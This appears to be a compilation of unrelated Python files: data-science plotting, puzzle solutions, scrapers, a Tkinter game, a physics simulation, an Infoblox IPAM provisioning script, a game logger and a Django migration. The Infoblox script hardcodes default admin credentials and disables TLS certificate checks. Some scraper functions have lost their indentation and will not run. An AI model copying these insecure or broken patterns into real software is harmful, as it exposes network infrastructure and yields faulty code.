    temp_y0 = []
    temp_y1 = []
    for val in temp.index:
        temp_y1.append(np.sum(data[tar_name][data[var_name]==val] == 1))
        temp_y0.append(np.sum(data[tar_name][data[var_name]==val] == 0))
    trace1 = go.Bar(
        x = temp.index,
        y = (temp_y1 / temp.sum()) * 100,
        name='YES'
    )
    trace2 = go.Bar(
        x = temp.index,
        y = (temp_y0 / temp.sum()) * 100,
        name='NO'
    )
    fig_data = [trace1, trace2]
    layout = go.Layout(
        title = var_name + ' for '+ tar_name,
        #barmode='stack',
        width = 1000,
        xaxis=dict(
            title=var_name,
            tickfont=dict(
                size=10,
                color='rgb(107, 107, 107)'
            )
        ),
        yaxis=dict(
            title='Count in %',
            titlefont=dict(
                size=16,
                color='rgb(107, 107, 107)'
            ),
            tickfont=dict(
                size=14,
                color='rgb(107, 107, 107)'
            )
        )
    )
    #render the figure inline
    fig = go.Figure(data=fig_data, layout=layout)
    iplot(fig)
def one_hot_encoder(df, nan_as_category = True):
    """One-hot encode every object-dtype column of *df*.

    Returns the encoded frame together with the list of freshly created
    dummy column names.  When nan_as_category is True, NaN gets its own
    dummy column per encoded feature.
    """
    before = list(df.columns)
    object_cols = [c for c in df.columns if df[c].dtype == 'object']
    df = pd.get_dummies(df, columns=object_cols, dummy_na=nan_as_category)
    added = [c for c in df.columns if c not in before]
    return df, added
def kde_target(var_name,tar_name, df):
    """Plot the kernel density of *var_name* split by the binary target
    *tar_name*, and print the correlation plus the per-class medians.
    Only usable when the target is a binary (0/1) variable.
    """
    # Calculate the correlation coefficient between the new variable and the target
    corr = df[tar_name].corr(df[var_name])
    # Calculate medians for repaid vs not repaid
    avg_repaid = df.loc[df[tar_name] == 0, var_name].median()
    avg_not_repaid = df.loc[df[tar_name] == 1, var_name].median()
    plt.figure(figsize = (9, 6))
    # Plot the distribution for target == 0 and target == 1
    sns.kdeplot(df.loc[df[tar_name] == 0, var_name], label = 'TARGET == 0')
    sns.kdeplot(df.loc[df[tar_name] == 1, var_name], label = 'TARGET == 1')
    # label the plot
    plt.xlabel(var_name); plt.ylabel('Density'); plt.title('%s Distribution' % var_name)
    plt.legend();
    # print out the correlation
    print('The correlation between %s and the TARGET is %0.4f' % (var_name, corr))
    # Print out average values
    print('Median value for loan that was not repaid = %0.4f' % avg_not_repaid)
    print('Median value for loan that was repaid = %0.4f' % avg_repaid)
|
class Solution(object):
    def sumsquare(self, n):
        """Sum of the squares of the decimal digits of n."""
        total = 0
        while n > 0:
            n, digit = divmod(n, 10)
            total += digit * digit
        return total
    def isHappy(self, n):
        """
        https://leetcode.com/problems/happy-number/
        Repeatedly replacing n by the sum of its squared digits either
        reaches 1 (happy) or enters a cycle.  Floyd's tortoise/hare
        detects the cycle without a hash set; the number is happy iff the
        meeting point is 1.
        """
        slow = self.sumsquare(n)
        fast = self.sumsquare(slow)
        while slow != fast:
            slow = self.sumsquare(slow)
            fast = self.sumsquare(self.sumsquare(fast))
        return fast == 1
|
import sys
# Dmitry Brant, Apr 2021
#Merge per-page image-candidate rows from prod dump files into one
#TSV line per (page, image) with a comma-joined source list.
arg_id = 1
while arg_id < len(sys.argv):
    #skip arguments that are not prod dump files
    #(bug fix: the original `continue` never advanced arg_id, so a single
    #non-matching argument made this loop spin forever)
    if "prod-" not in sys.argv[arg_id]:
        arg_id = arg_id + 1
        continue
    in_file = open(sys.argv[arg_id], encoding="utf-8")
    wiki_name = sys.argv[arg_id].split("-")[1]
    out_file = open(wiki_name + "_image_candidates.tsv", mode="w", encoding="utf-8")
    arg_id = arg_id + 1
    # remove headers
    line = in_file.readline()
    prev_pageid = -1
    source_str = ""
    prev_image = ""
    line_out = ""
    while True:
        line = in_file.readline()
        if not line:
            break
        line_arr = line.replace("\n", "").replace("\r", "").split("\t")
        if prev_pageid != int(line_arr[0]):
            # write out the previous line
            if len(line_out) > 0:
                out_file.write(line_out + source_str + "\n")
            line_out = ""
            source_str = ""
            prev_pageid = int(line_arr[0])
            prev_image = line_arr[2]
        source = line_arr[4]
        if len(line_out) == 0:
            line_out = line_arr[0] + "\t" + line_arr[2] + "\t"
        # add on new sources?
        if prev_image.replace("_", " ") == line_arr[2].replace("_", " "):
            if len(source_str) > 0:
                source_str += ","
            if source == "wikidata":
                source_str += "wd"
            elif source == "commons":
                source_str += "com"
            elif source == "wikipedia":
                source_str += line_arr[8].replace("wiki", "").replace("_min_nan", "")
            else:
                print(">>>>> " + source)
    # write out the last line
    if len(line_out) > 0:
        out_file.write(line_out + source_str + "\n")
    #close both files (the original never closed out_file, risking
    #unflushed output when the interpreter exits abnormally)
    out_file.close()
    in_file.close()
|
# -*- coding: utf-8 -*-
import datetime
import requests
import lxml.html
from eust.core import conf
_PAGE_DATE_FORMAT = r"%d/%m/%Y %H:%M:%S"
_VERSION_DATE_FORMAT = r"%Y-%m-%d %H%M%S"
def _get_table_name(row):
link_text = row.xpath("td")[0].xpath("a")[0].text
assert link_text.endswith(".tsv.gz"), link_text
return link_text.replace(".tsv.gz", "")
def _get_dl_url(row):
return row.xpath("td")[0].xpath("a")[0].attrib["href"]
def _get_table_date(row):
s = row.xpath("td")[3].text
assert s.startswith(" \xa0")
return datetime.datetime.strptime(s[2:], _PAGE_DATE_FORMAT)
def _scrape_bulk_infos(initial_letter):
    """Scrape the bulk-download listing page for all tables whose name
    starts with *initial_letter*.

    Returns {table_name: {"version": ..., "url": ...}}.  Raises
    ValueError when the page yields no table rows.
    """
    url_template = conf["bulk_tsv_page_url_template"]
    url = url_template.format(letter=initial_letter)
    page = requests.get(url)
    tree = lxml.html.fromstring(page.content)
    rows = tree.xpath("/html/body/div/form/table/tr")
    if not rows:
        raise ValueError("found no rows when scraping bulk download page")
    #sanity-check the two header rows before treating the rest as data
    h0 = rows[0]
    assert h0.xpath("th")[0].xpath("a")[0].text == "Name", h0
    h1 = rows[1]
    assert h1.xpath("td")[0].xpath("a")[0].text.endswith("up one level"), h1
    table_rows = rows[2:]
    return {
        _get_table_name(r): {
            "version": _get_table_date(r).strftime(_VERSION_DATE_FORMAT),
            "url": _get_dl_url(r),
        }
        for r in table_rows
    }
def _scrape_bulk_info(table):
    """Version/URL info for a single bulk table, scraped from the listing
    page for the table's initial letter.  Raises ValueError when the
    table is not present on that page."""
    infos = _scrape_bulk_infos(table[0])
    if table not in infos:
        raise ValueError(f"could not find bulk download info for {table}")
    return infos[table]
|
from tkinter import *
from tkinter.ttk import Entry,Button,OptionMenu
from PIL import Image,ImageTk
import random
from tkinter import filedialog as tkFileDialog
import os
import time
class Tiles():
    """Collection of puzzle tiles plus the gap tile; implements the sliding logic."""
    def __init__(self,grid):
        self.tiles=[]     #all Tile objects, including the one acting as the gap
        self.grid=grid    #board is grid x grid
        self.gap=None     #the tile playing the role of the empty slot
        self.moves=0      #number of successful slides
    def add(self,tile):
        self.tiles.append(tile)
    def getTile(self,*pos):
        """Tile currently at (row, col), or None when no tile is there (off-board)."""
        for tile in self.tiles:
            if tile.pos == pos:
                return tile
    def getTileAroundGap(self):
        """The gap's neighbours as (left, top, right, down); off-board neighbours are None."""
        gRow,gCol=self.gap.pos
        return self.getTile(gRow,gCol-1),self.getTile(gRow-1,gCol),self.getTile(gRow,gCol+1),self.getTile(gRow+1,gCol)
    def changeGap(self,tile):
        """Swap the gap with *tile* and count the move.

        Bug fix: the original bare `except:` swallowed every error;
        only AttributeError (tile is None because the gap sits on an
        edge, or the gap was never set) is expected and ignored -- any
        other failure now propagates.
        """
        try:
            gPos=self.gap.pos
            self.gap.pos=tile.pos
            tile.pos=gPos
            self.moves+=1
        except AttributeError:
            pass
    def slide(self,key):
        """Move the tile opposite the pressed arrow key into the gap, then redraw."""
        left,top,right,down=self.getTileAroundGap()
        if key == 'Up':
            self.changeGap(down)
        if key == 'Down':
            self.changeGap(top)
        if key == 'Left':
            self.changeGap(right)
        if key == 'Right':
            self.changeGap(left)
        self.show()
    def shuffle(self):
        """Randomly permute which tile sits at which board position."""
        random.shuffle(self.tiles)
        i=0
        for row in range(self.grid):
            for col in range(self.grid):
                self.tiles[i].pos=(row,col)
                i+=1
    def show(self):
        #draw every tile except the gap
        for tile in self.tiles:
            if self.gap != tile:
                tile.show()
    def setGap(self,index):
        self.gap = self.tiles[index]
    def isCorrect(self):
        """True when every tile is back at its original position."""
        for tile in self.tiles:
            if not tile.isCorrectPos():
                return False
        return True
class Tile(Label):
    #one puzzle piece: a Tk Label displaying a single crop of the image
    def __init__(self,parent,image,pos):
        Label.__init__(self,parent,image=image)
        #keep a reference to the PhotoImage so Tk does not garbage-collect it
        self.image=image
        #current board position (row, col); swapped around as tiles slide
        self.pos=pos
        #the original (correct) position, fixed at creation time
        self.curPos=pos
    def show(self):
        #place the widget in the parent's grid at its current position
        self.grid(row=self.pos[0],column=self.pos[1])
    def isCorrectPos(self):
        #solved when the current position matches the original one
        return self.pos == self.curPos
class Board(Frame):
    #the puzzle board: slices the chosen image into grid x grid tiles
    MAX_BOARD_SIZE=500
    def __init__(self,parent,image,grid,win,shuffle,menu,*args,**kwargs):
        Frame.__init__(self,parent,*args,**kwargs)
        self.parent=parent
        #NOTE(review): this attribute shadows Frame.grid on the Board
        #instance -- tiles call .grid() on themselves, so it appears
        #intentional, but it is fragile; confirm before refactoring
        self.grid=grid
        self.win = win          #callback invoked with the move count on success
        self.mainMenu = menu    #callback bound to the 'g' key
        self.image=self.openImage(image)
        self.tileSize=self.image.size[0]/self.grid
        self.shuffle = shuffle  #False = "easy" mode: no gap, no shuffling
        self.tiles=self.createTiles()
        if shuffle==True:
            self.tiles.shuffle()
        self.tiles.show()
        self.bindKeys()
    def bindKeys(self):
        #arrow keys slide tiles; 'g' returns to the main menu
        self.bind_all('<Key-Up>',self.slide)
        self.bind_all('<Key-Right>',self.slide)
        self.bind_all('<Key-Down>',self.slide)
        self.bind_all('<Key-Left>',self.slide)
        self.bind_all('<g>',self.mainMenu)
    def openImage(self,image):
        #load the image, cap it at MAX_BOARD_SIZE and crop it to a square
        image=Image.open(image)
        imageSize=min(image.size)
        if min(image.size) > self.MAX_BOARD_SIZE:
            #NOTE(review): Image.ANTIALIAS was removed in Pillow 10
            #(use Image.LANCZOS) -- confirm the pinned Pillow version
            image=image.resize((self.MAX_BOARD_SIZE,self.MAX_BOARD_SIZE),Image.ANTIALIAS)
        if image.size[0] != image.size[1]:
            image=image.crop((0,0,image.size[0],image.size[0]))
        return image
    def slide(self,event):
        #forward the key press to the tile collection and check for a win
        self.tiles.slide(event.keysym)
        if self.tiles.isCorrect()==True:
            self.win(self.tiles.moves)
    def createTiles(self):
        #cut the image into grid x grid tiles; in shuffle mode the last
        #tile becomes the gap
        tiles=Tiles(self.grid)
        for row in range(self.grid):
            for col in range(self.grid):
                x0=col*self.tileSize
                y0=row*self.tileSize
                x1=x0+self.tileSize
                y1=y0+self.tileSize
                tileImage=ImageTk.PhotoImage(self.image.crop((x0,y0,x1,y1)))
                tile=Tile(self,tileImage,(row,col))
                tiles.add(tile)
        if self.shuffle==True:
            tiles.setGap(-1)
        return tiles
class Main():
    """Application controller: main menu, puzzle board and win screen."""
    def __init__(self, parent):
        self.parent = parent
        self.image = StringVar()      # path of the selected puzzle image
        self.winText = StringVar()    # message shown on the win screen
        self.grid = IntVar()          # selected grid size (difficulty)
        self.directory = r'C:\Users\Hasin Choudhury\Desktop\PythonP\images'
        self.imageCount = 0           # index for cycling images via 'Load Next'
        self.shuffle = True           # False = board stays solved (easy mode)
        self.createWidgets()
    def createWidgets(self):
        """Build the menu, board placeholder and win screen; only the menu is packed."""
        padx = 10
        pady = 10
        self.mainFrame = Frame(self.parent)
        Label(self.mainFrame, text = 'Yay! A Puzzle!', font = ('', 50)).pack(padx=padx, pady=pady)
        frame = Frame(self.mainFrame)
        Label(frame, text = 'Image').grid(sticky=W)
        Entry(frame, textvariable = self.image, width=80).grid(row=0, column=1, padx=padx, pady=pady)
        # NOTE(review): self.load is rebound from the load() method to this
        # Button; the command captured the bound method first, so both work.
        self.load = Button(frame, text='Load', command=self.load)
        self.load.grid(row=0, column=2, pady=pady, padx=padx)
        Label(frame, text = 'Grid Count (difficulty)').grid(sticky=W)
        OptionMenu(frame, self.grid, *[2,3,4,5,6,7,8,9,10]).grid(row=1, column=1, padx=padx, pady=pady)
        Label(frame, text = 'Show completed pic').grid(sticky=W)
        self.result = Button(frame, text='Off', command=self.easyPeezy)
        self.result.grid(row=2, column=1, pady=pady, padx=padx)
        frame.pack(padx=padx, pady=pady)
        Label(self.mainFrame, text = 'NOTE: Hit G to return to menu!!! (Coward, hence G. Seriously though, use it)', font = ('', 12)).pack(padx=padx, pady=pady)
        Button(self.mainFrame, text='Start', command=self.start).pack(padx=padx, pady=pady)
        self.mainFrame.pack()
        self.board = Frame(self.parent)    # placeholder; replaced by a Board in start()
        self.winFrame = Frame(self.parent)
        Label(self.winFrame, textvariable=self.winText, font=('', 50)).pack(padx=padx, pady=pady)
        Button(self.winFrame, text='Play again', command=self.playAgain).pack(padx=padx, pady=pady)
    #commands
    def start(self):
        """Swap the menu for a new Board, but only if the image path exists."""
        image = self.image.get()
        grid = self.grid.get()
        if os.path.exists(image):
            self.board = Board(self.parent, image, grid, self.win, self.shuffle, self.mainMenu)
            self.mainFrame.pack_forget()
            self.board.pack()
    def easyPeezy(self):
        """Toggle shuffle (easy) mode and update the button caption."""
        if self.shuffle == True:
            self.shuffle = not self.shuffle
            self.result['text'] = 'On'
        elif self.shuffle == False:
            self.shuffle = not self.shuffle
            self.result['text'] = 'Off'
    def load(self):
        """Put the next .jpg/.png from self.directory into the path entry."""
        images = []
        for filename in os.listdir(self.directory):
            if filename.endswith(".jpg") or filename.endswith(".png"):
                images.append(os.path.join(self.directory, filename))
            else:
                continue
        # NOTE(review): imageCount never wraps, so clicking past the last
        # image raises IndexError -- confirm whether wrap-around was intended.
        self.image.set(images[self.imageCount])
        self.load['text'] = 'Load Next'
        self.imageCount += 1
    def win(self, moves):
        """Board callback: replace the board with the win screen."""
        print('you won')
        self.board.pack_forget()
        self.winText.set("Woohoo! You win with {0} moves".format(moves))
        self.winFrame.pack()
    def playAgain(self):
        """Return from the win screen to the menu."""
        self.winFrame.pack_forget()
        self.mainFrame.pack()
    def mainMenu(self, nothing):
        """Key-binding callback ('g'): abandon the board and show the menu."""
        self.board.pack_forget()
        self.mainFrame.pack()
# Launch the puzzle application when run as a script.
if __name__ == "__main__":
    root = Tk()
    Main(root)
    print('test1')  # leftover debug output
    root.mainloop()
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import seaborn as sns
from scipy import stats
from scipy.optimize import fsolve
#simulated data: underdamped Brownian particle in a harmonic trap
N = 32768 #Number of data points
m = 2e-12  # particle mass in kg (NOTE(review): 2e-12 kg = 2 ng; original comment said 1 ng)
T = 300 #Kelvin
k = 300e-6 #kg/s2 (trap stiffness)
gamma_factor = 30  # how far below critical damping the drag is set
f_sam = 65536 #Hz sampling frequency
dt = 1/f_sam  # sampling interval in seconds
gamma2_crit = 4*m*k  # square of the critical damping coefficient
gamma_crit = np.sqrt(4*m*k)
gamma2 = gamma2_crit/(gamma_factor**2) #
gamma = gamma_crit/gamma_factor #
omega0 = np.sqrt(k/m)  # undamped natural angular frequency (rad/s)
tau = m/gamma          # momentum relaxation time (s)
omega = np.sqrt((omega0**2)-(1/(4*tau*tau)))  # damped oscillation frequency
k_B = 1.38064881313131e-23 # Boltzmann constant (Newton metre/Kelvin)
D = k_B*T/gamma  # diffusion coefficient
simparams = (N, dt, omega, omega0, tau)
#Function to construct sigma matrix
def sigmamatrix(simparams):
    """Return the noise covariance entries (sigma2_xx, sigma2_vv, sigma2_xv)
    for one exact integration step of the damped harmonic oscillator.

    simparams is the tuple (N, dt, omega, omega0, tau).
    Depends on the module-level diffusion constant ``D``.
    """
    # BUG FIX: the parameter used to be overwritten by rebuilding the tuple
    # from module globals (simparams = (N, dt, ...)), so caller-supplied
    # parameters were silently ignored. Unpack the argument instead.
    N, dt, omega, omega0, tau = simparams
    ss1 = np.cos(2*omega*dt)-(2*omega*tau*np.sin(2*omega*dt))-(4*(omega0**2)*(tau**2))
    ss2 = np.cos(2*omega*dt)+(2*omega*tau*np.sin(2*omega*dt))-(4*(omega0**2)*(tau**2))
    sigma2_xx = (D/(4*(omega**2)*(omega0**2)*(tau**3)))*((4*(omega**2)*(tau**2))+(np.exp(-dt/tau))*(ss1))
    sigma2_vv = (D/(4*(omega**2)*(tau**3)))*((4*(omega**2)*(tau**2))+(np.exp(-dt/tau))*(ss2))
    sigma2_xv = (D/((omega**2)*(tau**2)))*(np.exp(-dt/tau)*np.sin(omega*dt)*np.sin(omega*dt))
    return sigma2_xx, sigma2_vv, sigma2_xv
sigma_matrix = sigmamatrix(simparams)
#Function to construct exponential matrix
def explambda(simparams):
    """Return exp(Lambda*dt), the 2x2 drift propagator of the damped oscillator.

    simparams is the tuple (N, dt, omega, omega0, tau).
    """
    N, dt, omega, omega0, tau = simparams
    identity = np.eye(2)
    # Off-diagonal generator J with J22 = -J11.
    j11 = (1/(2*omega*tau))
    off_diag = np.matrix([[j11, (1/omega)],
                          [-(omega0**2)/omega, -j11]])
    decay = np.exp(-dt/(2*tau))
    return decay*((np.cos(omega*dt)*identity)+(np.sin(omega*dt)*off_diag))
expM = explambda(simparams)
def simxv(simparams, sigma_matrix, expM):
    """Simulate N correlated (position, velocity) samples of the oscillator.

    Each step applies the exact propagator expM and adds Gaussian noise with
    the covariance given by sigma_matrix = (sigma2_xx, sigma2_vv, sigma2_xv).
    Returns the (N, 1) arrays (x, v).
    """
    N, dt, omega, omega0, tau = simparams
    sigma2_xx, sigma2_vv, sigma2_xv = sigma_matrix
    x = np.zeros([N, 1])
    v = np.zeros([N, 1])
    # Cholesky-style factors of the 2x2 noise covariance, hoisted out of the loop.
    sd_x = np.sqrt(sigma2_xx)
    cross = sigma2_xv/(np.sqrt(sigma2_xx))
    resid = np.sqrt(sigma2_vv - ((sigma2_xv**2)/(sigma2_xx)))
    for step in range(N - 1):
        noise = np.random.randn(2, 1)  # one draw per step, same order as before
        dx = sd_x*noise[0]
        dv = cross*noise[0] + resid*noise[1]
        state = np.dot(expM, np.array([x[step], v[step]])) + np.array([dx, dv])
        x[step + 1] = state[0]
        v[step + 1] = state[1]
    return x, v
# Run the simulation and dump both trajectories as space-separated text files.
x, v = simxv(simparams, sigma_matrix, expM)
x.tofile('position.txt', sep=" ", format="%s")
v.tofile('velocity.txt', sep=" ", format="%s")
import re
# Advent of Code 2015 day 8, part 2: total re-encoded length minus raw length.
lines = []
with open("inputData.txt", "r") as infile:
    for line in infile:
        lines.append(line.replace('\n', '').replace('\r', ''))

codeLetters = 0
escapedLetters = 0
for line in lines:
    codeLetters += len(line)
    # Encoding a string literal escapes every backslash and every double
    # quote (one extra character each) and wraps the result in two quotes.
    # BUG FIX: re.escape() was wrong here -- on Python 3.7+ it no longer
    # escapes '"' at all, and it escapes punctuation the puzzle does not.
    escapedLetters += len(line) + line.count('\\') + line.count('"') + 2  # + 2 for the two quotes we didn't add

difference = escapedLetters - codeLetters
print(str(difference))
|
#!/usr/bin/env python
# More verbose
# Infoblox WAPI provisioning helper (Python 2, CloudCenter callout):
# reserves the next free IP on the VM's VLAN, creates a DNS host record,
# and echoes the network settings back to CloudCenter on stdout.
import requests
import os
import json

# The Infoblox appliance uses a self-signed certificate; silence urllib3 warnings.
requests.packages.urllib3.disable_warnings()

# VM identity is passed in via CloudCenter environment variables.
hostname = os.getenv('vmName')
domain = "cliqrdemo"
fqdn = hostname + "." + domain
network = os.getenv('networkName')
netmask = "255.255.255.0"
gateway = "10.110.5.1"
dns_server_list = "10.100.1.15,8.8.8.8"

#Get network reference
url = "https://10.110.5.254/wapi/v1.0/network"
querystring = {"*VLAN": network}  # search on the VLAN extensible attribute
headers = {}
response = requests.request("GET", url, headers=headers, params=querystring, verify=False, auth=('admin', 'infoblox'))
netRef = response.json()[0]['_ref']

#Get next available IP address
url = "https://10.110.5.254/wapi/v1.0/"+netRef
querystring = {
    "_function":"next_available_ip",
    "num":"1"
}
headers = {}
response = requests.request("POST", url, headers=headers, params=querystring, verify=False, auth=('admin', 'infoblox'))
ip = response.json()['ips'][0]

#Create Host Record
url = "https://10.110.5.254/wapi/v1.0/record:host"
payload = {
    "ipv4addrs":[
        {
            "ipv4addr":ip
        }
    ],
    "name": fqdn,
    "configure_for_dns": True
}
headers = {'content-type': "application/json"}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers, verify=False, auth=('admin', 'infoblox'))

#Echo key/values back to CloudCenter for VM creation
print "nicCount=1"
print "nicIP_0=" + ip
print "nicUseDhcp_0=false"
print "DnsServerList="+dns_server_list
print "nicGateway_0="+gateway
print "nicNetmask_0="+netmask
print "domainName="+domain
print "hwClockUTC=true"
print "timeZone=Canada/Eastern"
print "osHostname="+hostname
# NOTE(review): a WAPI POST to record:host returns the new object's _ref as a
# JSON string, so the concatenation below works only if that holds -- confirm.
print "infobloxRef="+response.json()
|
import SWPlugin
import json
import os
import time
from SWParser import monster_name, monster_attribute
# Mapping from Summoners War summon item master id to a readable scroll name.
sources = {
    1: 'Unknown',
    2: 'Mystical',
    3: 'Light & Dark',
    4: 'Water',
    5: 'Fire',
    6: 'Wind',
    7: 'Legendary',
    8: 'Exclusive',
    9: "Legendary Pieces",
    10: "Light & Dark Pieces"
}

def identify_scroll(id):
    """Return the scroll name for *id*.

    ROBUSTNESS FIX: unknown ids (e.g. scroll types added after this table
    was written) now map to 'Unknown' instead of raising KeyError.
    """
    return sources.get(id, sources[1])
class SummonLogger(SWPlugin.SWPlugin):
    """Proxy plugin that appends one CSV row per summon to <wizard_id>-summons.csv."""
    def __init__(self):
        with open('swproxy.config') as f:
            self.config = json.load(f)
    def process_request(self, req_json, resp_json):
        """Dispatch: only SummonUnit commands are logged, and only when enabled."""
        config = self.config
        if 'log_summon' not in config or not config['log_summon']:
            return
        command = req_json['command']
        if command == 'SummonUnit':
            return self.log_summon(req_json, resp_json, config)
    def log_summon(self, req_json, resp_json, config):
        """Append the summoned unit's details to the per-wizard CSV file."""
        if not config["log_summon"]:
            return
        if 'unit_list' in resp_json:
            # Renamed from 'time' so it no longer shadows any time module import.
            create_time = resp_json['unit_list'][0]['create_time']
            if 'item_info' in resp_json:
                scroll = identify_scroll(resp_json['item_info']['item_master_id'])
            else:
                # BUG FIX: 'scroll' used to stay unbound for modes other than
                # 3/5, raising UnboundLocalError at the format line below.
                mode = req_json['mode']
                if mode == 3:
                    scroll = 'Crystal'
                elif mode == 5:
                    scroll = 'Social'
                else:
                    scroll = 'Unknown'
            unit_name = monster_name(resp_json['unit_list'][0]['unit_master_id'], '', False)
            attribute = monster_attribute(resp_json['unit_list'][0]['attribute'])
            grade = resp_json['unit_list'][0]['class']
            awakened = str(resp_json['unit_list'][0]['unit_master_id'])
            # The second-to-last digit of the master id encodes awakening.
            if int(awakened[-2]) == 0:
                awake = 'No'
            else:
                awake = 'Yes'
            log_entry = "%s,%s,%s,%s,%s*,%s" % (create_time, scroll, unit_name, attribute, grade, awake)
            filename = "%s-summons.csv" % resp_json['wizard_info']['wizard_id']
            if not os.path.exists(filename):
                # First write: prepend the CSV header.
                log_entry = 'Date,Summon Type,Unit,Attribute,Grade,Awakened\n' + log_entry
            with open(filename, "a") as fr:
                fr.write(log_entry)
                fr.write('\n')
        return
|
# Exercise 1
# To run this program go to the terminal and use the command `python exercise1.py`

# Greet the user by the name they type in.
print("Welcome to Python")
print('Enter your name:')
x = input()
print('Hello, ' + x)

# TODO:
# Get the users age and determine what year they were born.
# print('How old are you?')
# print('So you were born in' + x)
|
import cbmpy
import numpy as np
import os
import sys
import pandas as pd

# Command-line driven FBA run: SBML model + growth medium bounds + proteomics
# constraints, solved with CPLEX; results written into <scriptLoc>/<resultsFolder>.
modelLoc = sys.argv[1]          # path to the SBML (FBC v3) model
growthMediumLoc = sys.argv[2]   # CSV: Reaction ID, Lower Bound
scriptLoc = sys.argv[3]
proteomicsLoc = sys.argv[4]     # CSV: Entry, conc_mmolgDW, 0.9conc
resultsFolder = sys.argv[5]
model = cbmpy.CBRead.readSBML3FBC(modelLoc, scan_notes_gpr = False)
growthData = pd.read_csv(growthMediumLoc)
proteomicsData = pd.read_csv(proteomicsLoc)
resultsPath = '%s/%s' %(scriptLoc, resultsFolder)
if not (os.path.isdir(resultsPath)): os.mkdir(resultsPath)
os.chdir(resultsPath)
"""
Metabolic constraints
"""
# Apply the growth-medium lower bound to each listed exchange reaction.
for i in growthData['Reaction ID']:
    model.setReactionLowerBound(i, growthData['Lower Bound'].loc[growthData['Reaction ID']==i].values[0])
"""
Proteomic constraints
Should be commented out for the "w/o proteomic constraints" condition.
"""
# Skip spreadsheet error markers, NaNs and zero concentrations.
for i in proteomicsData['Entry']:
    if (proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0] == ('#VALUE!')): continue
    elif np.isnan(float(proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0])): continue
    elif (proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0] == 0.0): continue
    else: model.setReactionBounds('P_%s_synthesis' %(i), float(proteomicsData['0.9conc'].loc[proteomicsData['Entry']==i].values[0]), 1000.0)
"""
Total protein volume constraint for E. coli
See the supplementary material of the paper for the derivation of the constraint
"""
protSum=float(0.62/0.34)
pID = 'UP000000625'  # NOTE(review): assigned but unused below -- confirm
constraint = []
UniProtIDs = pd.read_csv('proteinMasses.txt', sep = '\t')
# One (coefficient, flux-name) pair per protein; masses have thousands commas.
for entry in UniProtIDs.index: constraint.append([(7.3*pow(10,-4)*float(UniProtIDs['Mass'][entry].replace(',', ''))), 'P_%s_synthesis' %(UniProtIDs['Entry'][entry])])
model.addUserConstraint(pid = None, fluxes = constraint, operator = '<=', rhs = protSum)
fbaResult = cbmpy.CBCPLEX.cplx_analyzeModel(model)
if np.isnan(float(fbaResult)): sys.exit(0) #terminate if infeasible
fva = cbmpy.CBCPLEX.cplx_FluxVariabilityAnalysis(model, pre_opt=True)
cbmpy.CBWrite.writeFVAdata(fva[0], fva[1], os.path.split(growthMediumLoc)[1])
|
# Generated by Django 3.2.8 on 2021-10-12 03:54
from django.db import migrations, models


class Migration(migrations.Migration):
    """Adds verbose names to Product, a 'delivery' country field, and makes
    'warranty' an integer number of years (generated migration; do not edit
    beyond comments)."""
    dependencies = [
        ("product", "0001_initial"),
    ]
    operations = [
        migrations.AlterModelOptions(
            name="product",
            options={"verbose_name": "Product", "verbose_name_plural": "Products"},
        ),
        migrations.AddField(
            model_name="product",
            name="delivery",
            field=models.CharField(
                default="India", max_length=40, verbose_name="Delivery Country"
            ),
        ),
        migrations.AlterField(
            model_name="product",
            name="warranty",
            field=models.IntegerField(default=1, verbose_name="Warranty in Year"),
        ),
    ]
|
# Exercise 5.14 - Book: read integers until 0, then report count, sum and mean.
soma = media = 0
qtd = 0
while True:
    num = int(input(f'Digite o {qtd + 1}° número: '))
    if num == 0:
        break  # 0 is the sentinel that ends input
    qtd += 1
    soma += num
    media = soma / qtd  # running mean; qtd >= 1 here, so no division by zero
print('=-=' * 15)
print(f'Quantidade de números informados: {qtd}')
print(f'Soma de todos os valores: {soma}')
print(f'Média dos valores: {media:.2f}')
|
__author__ = 'Justin'
from sklearn.linear_model import LogisticRegression
import os
import json
import networkx as nx
import numpy as np
from GetRouteInfo import routeinfo

# Per user: fit a logistic regression predicting whether the 'Zen' route was
# chosen, from its relative Zenness gain and travel-time cost, then plot the
# fitted probability surface in 3-D.
persons = ['Justin','Justin2','Pablo']
for person in persons:
    # Load Data
    cwd = os.getcwd()
    folder = os.path.abspath(os.path.join(cwd, '..', 'Project Data','UserWeights',person))
    filename = 'PathOptions'
    filepath = os.path.abspath(os.path.join(folder,filename))
    with open(filepath) as json_data:
        PathOptions = json.load(json_data)
    filename = 'Choices'
    filepath = os.path.abspath(os.path.join(folder,filename))
    with open(filepath) as json_data:
        Choices = json.load(json_data)
    filename = "OSMNetworkReducedSet.gexf"
    filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','Networks',filename))
    fh=open(filepath,'rb')
    G = nx.read_gexf(fh)
    fh.close  # NOTE(review): missing parentheses -- the file is never actually closed
    # Format Data
    y = []
    X = []
    for index,choice in enumerate(Choices):
        if(choice == '1'): # Zen Chosen
            y.append(1)
        elif(choice == '2'): # Fastest Chosen
            y.append(0)
        if(choice == '1' or choice == '2'):
            zenRoute = PathOptions[index]['Zen']
            fastestRoute = PathOptions[index]['Fast']
            zenRouteInfo = routeinfo(G,zenRoute,['currenttime','Zenness'])
            fastestRouteInfo = routeinfo(G,fastestRoute,['currenttime','Zenness'])
            # Relative Zenness improvement of the Zen route / its relative time cost.
            ZenDiff = (fastestRouteInfo['Zenness']-zenRouteInfo['Zenness'])/fastestRouteInfo['Zenness']
            TimeDiff = (zenRouteInfo['currenttime']-fastestRouteInfo['currenttime'])/zenRouteInfo['currenttime']
            X.append([ZenDiff,TimeDiff])
    # Logistic Regression
    model = LogisticRegression()
    model = model.fit(np.array(X),np.array(y))
    print('Model Accuracy: '+str(model.score(X,y)))
    print('Average Rate: '+str(np.mean(y)))
    # Plot Logistic Regression
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    from matplotlib import cm
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    # Probability surface over the unit square of (ZenDiff, TimeDiff).
    xx, yy = np.mgrid[0:1:0.1, 0:1:0.1]
    grid = np.c_[xx.ravel(), yy.ravel()]
    probs = model.predict_proba(grid)[:, 1].reshape(xx.shape)
    surf = ax.plot_surface(xx, yy, probs, cmap=cm.coolwarm,
                           linewidth=0, antialiased=False)
